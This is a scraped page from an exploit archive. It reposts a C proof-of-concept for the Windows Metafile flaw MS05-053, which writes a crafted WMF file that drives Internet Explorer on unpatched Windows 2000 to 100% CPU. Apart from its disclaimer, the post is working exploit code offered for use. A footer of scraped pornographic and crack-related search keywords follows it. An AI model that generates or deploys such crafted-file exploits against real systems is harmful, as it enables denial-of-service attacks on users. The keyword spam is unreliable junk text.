about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , Microsoft Windows Metafile (WMF) Images Handling Remote Exploit (MS05-053)



2005-11-29 Microsoft Windows Metafile (WMF) Images Handling Remote Exploit (MS05-053) 
Rated as : Critical 
Note : Proof of concept exploit (DoS)

/*
* Author: Winny Thomas
* Pune, INDIA
*
* The crafted metafile from this code when viewed in internet explorer
raises the CPU
* utilization to 100%. The code was tested on Windows 2000 server SP4. The
issue does
* not occur with the hotfix for GDI (MS05-053) installed
*
* Disclaimer: This code is for educational/testing purposes by authosized
persons on 
* networks/systems setup for such a purpose.The author of this code shall
not bear 
* any responsibility for any damage caused by using this code.
*
*/

#include <stdio.h>

unsigned char wmfheader[] = 
"\xd7\xcd\xc6\x9a\x00\x00\xc6\xfb\xca\x02\xaa\x02\x39\x09\xe8\x03"
"\x00\x00\x00\x00\x66\xa6"
"\x01\x00"
"\x09\x00"
"\x00\x03"
"\xff\xff\xff\xff" //Metafile file size
"\x04\x00"
"\xff\xff\xff\xff" //Largest record size
"\x00\x00";

unsigned char MetafileRECORD[] = 
"\x05\x00\x00\x00\x0b\x02\x39\x09\xc6\xfb\x08\x00\x00\x00\xfa\x02"
"\x05\x00\x00\x00\x00\x00\xff\xff\xff\x00\x04\x00\x00\x00\x2d\x01"
"\x01\x00\x04\x00\x00\x00\x06\x01\x01\x00\x04\x00\x00\x00\x2d\x01"
"\x02\x00\x07\x00\x00\x00\xfc\x02\x00\x00\xff\xff\xff\x00\x00\x00"
"\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\x2d\x01\x02\x00"
"\x04\x00\x00\x00\x2d\x01\x03\x00\x04\x00\x00\x00\xf0\x01\x00\x00"
"\x07\x00\x00\x00\xfc\x02\x00\x00\xfa\x94\x93\x00\x00\x00\x04\x00"
"\x00\x00\x2d\x01\x00\x00\x04\x00\x00\x00\x2d\x01\x01\x00\x04\x00"
"\x00\x00\x06\x01\x01\x00\x14\x00\x00\x00\x24\x03\x08\x00\xc6\xfb"
"\x9b\x03\xbc\xfe\x9b\x03\x0f\x01\x1a\x07\xa5\x02\x1a\x07\xf4\x00"
"\x39\x09\xd5\xfc\x36\x07\x86\xfe\x36\x07\xc6\xfb\x9b\x03";

unsigned char wmfeof[] = 
"\x00\x00\x00\x00";

int main(int argc, char *argv[])
{
FILE *fp;
char wmfbuf[1024];
int metafilesize, metafilesizeW, i, j;

metafilesize = sizeof (wmfheader) + sizeof (MetafileRECORD) +
sizeof(wmfeof) -3;
metafilesizeW = metafilesize/2;
memcpy((unsigned long *)&wmfheader[28], &metafilesizeW, 4);

printf("[*] Adding Metafile header\n");
for (i = 0; i < sizeof(wmfheader) -1; i++) {
(unsigned char)wmfbuf[i] = (unsigned char)wmfheader[i];
}

printf("[*] Adding Metafile records\n");
for (j = i, i = 0; i < sizeof(MetafileRECORD) -1; i++, j++) {
wmfbuf[j] = MetafileRECORD[i];
}

printf("[*] Adding EOF record\n");
for (i = 0; i < sizeof(wmfeof) -1; i++, j++) {
wmfbuf[j] = wmfeof[i];
}

printf("[*] Creating Metafile (MS053.wmf)\n");
fp = fopen("MS053.wmf", "wb");
fwrite(wmfbuf, 1, metafilesize, fp);
fclose(fp);
}
securitydot.net - 2005-11-29

Advertising

Copyright 2007, SecurityDot
Sun, 06 Dec 2009 04:27:13 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
Indianchut Wwworldsex Wwworldsex Wwworldsex www 89six Wwworldsex Wwworldsex www.pornpi Wwworldsex Fathima www.4544.c Wwworldsex actress mo Wwworldsex Wwworldsex Wwworldsex Wwworldsex Wwworldsex Wwworldsex Malyalm.se Wwworldsex sebilgan Wwworldsex CMS is Fre www.mom.bo global ann Www xxx moe Sexyphotos chinatgno1 Enano_CMS_ Crack Data sex xx ass sexo espli xp%20admin phpbb2 pa news for C Bugil Dewi MKPQuote yahoo mese pornosexx. gda www.winsun www.hostfi Drievers photograto Crack Data trishabath Eating pus sex xx ass